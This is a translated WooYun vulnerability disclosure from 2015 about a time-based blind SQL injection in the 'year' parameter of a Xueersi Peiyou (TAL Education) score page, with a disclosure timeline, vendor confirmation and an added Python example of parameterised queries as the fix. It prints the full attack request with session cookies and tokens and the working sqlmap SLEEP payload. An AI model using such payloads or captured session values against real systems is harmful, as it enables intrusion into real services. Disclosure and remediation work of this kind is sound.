Vulnerability summary

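Vulnerability ID: wooyun-2015-0125250

Title: SQL injection vulnerability in a Xueersi Peiyou (学而思培优) subsite

Vendor: TAL Education Group (好未来集团), Xueersi Peiyou (学而思培优)

Author: missy

Submitted: 2015-07-08 11:22

Fixed: 2015-08-23 19:18

Published: 2015-08-23 19:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]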


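Vulnerability details

Disclosure status:

2015-07-08: Details reported to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and experts in related fields
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public

Brief description:

Detailed description:

Injection: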
POST /Students/getScore/ HTTP/1.1
Host: zz.speiyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zz.speiyou.com/Students/getScore/
Cookie: CAKEPHP=jv6johj4hvkejopht9u1qfema0; lastact=http%3A%2F%2Fzz.speiyou.com%2FUsers%2FcompleteInfo%2F; BIGipServerPY_Web-YouHua_Pool=1846257856.20480.0000; jfs=http%3A%2F%2Fzz.speiyou.com%2Fhomes%3Ftk%3DZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; Hm_lvt_7140e3d0654bb622b1e162589f9e278c=1436275347; Hm_lpvt_7140e3d0654bb622b1e162589f9e278c=1436276354; XESCAS[tk]=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; stoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%18%17%2C%94C%AD%60%10%C7s%E9%E6%22%AB%1B%24yC%F9%28%27%F8%16%8F%85R%FC%CF%E4%DDM+%F1%0D%D7h+%D0%D46%2A%82%E0%CAI%E84%FF%EAF%BC%16%28_%92p%8D%CA%0B%14%23%E9dX%0B%B5%17%A1%F3%8D%93%8B%C1g%9BmG%7C%97%16%CE%DE_%8FG%FAi5%7B%B0%22%98%3FV_%B7%C4%07R%D5%C6cb%5Cz%94e%08%D2%10%40%16%8D%0B%F8u%26%1C%92%AE%A7%ED%DE%3B%18%8D%E0d; newstoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; __utma=190819817.287472353.1436276128.1436276128.1436276128.1; __utmb=190819817.2.10.1436276128; __utmc=190819817; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276130; indexGradeType=gaozhong; indexGrade=10; indexSubject=ff80808127d77caa0127d7e10f1c00c4; looyu_id=5d3a668cd242b8126a2601c28d8eb1e256_31691%3A1; B_cookie_login_status=ok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2


Parameter: year



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: year (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: year=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0.12
current database: 'py_rxcs'

Proof of vulnerability:

Fix:

Filter the relevant parameters

Copyright notice: when reposting, credit the source missy@乌云 (WooYun)
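
One way to apply the suggested fix to the `year` parameter, shown as an added example that is not code from the report or from the vendor: an allow-list check on the field plus a bound query parameter. The `scores` table, its columns and the function names are assumptions, and SQLite stands in for the MySQL back end.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Request bodies copied from the report: the normal form post and the sqlmap payload.
NORMAL_BODY = "year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2"
REPORTED_BODY = ("year=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ"
                 "&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2")

YEAR_RE = re.compile(r"[0-9]{4}")  # ASCII digits only; \d would also accept other scripts


def make_db():
    """Constructed stand-in table; the real schema is not shown in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE scores (year TEXT, paper_name TEXT, score INTEGER)")
    db.execute("INSERT INTO scores VALUES ('2015', '1111', 92)")
    return db


def single(fields, name):
    """Return the one value of a form field, rejecting missing or repeated fields."""
    values = fields.get(name, [])
    if len(values) != 1:
        raise ValueError(f"{name}: expected exactly one value")
    return values[0]


def lookup(db, year, paper_name):
    """Bound parameters: the values never become part of the SQL text."""
    sql = "SELECT score FROM scores WHERE year = ? AND paper_name = ?"
    return db.execute(sql, (year, paper_name)).fetchall()


def get_score(db, body):
    """Validate `year` against an allow-list pattern, then run the bound query."""
    fields = parse_qs(body, keep_blank_values=True)
    year = single(fields, "year")
    if not YEAR_RE.fullmatch(year):
        raise ValueError("year: must be four digits")
    return lookup(db, year, single(fields, "paperName"))
```

The allow-list check is the filtering the report asks for; the bound parameter keeps the query safe even if such a check is missed on another field.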


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-07-09 19:17

Vendor reply:

Thanks, we are fixing it now

Latest status:

None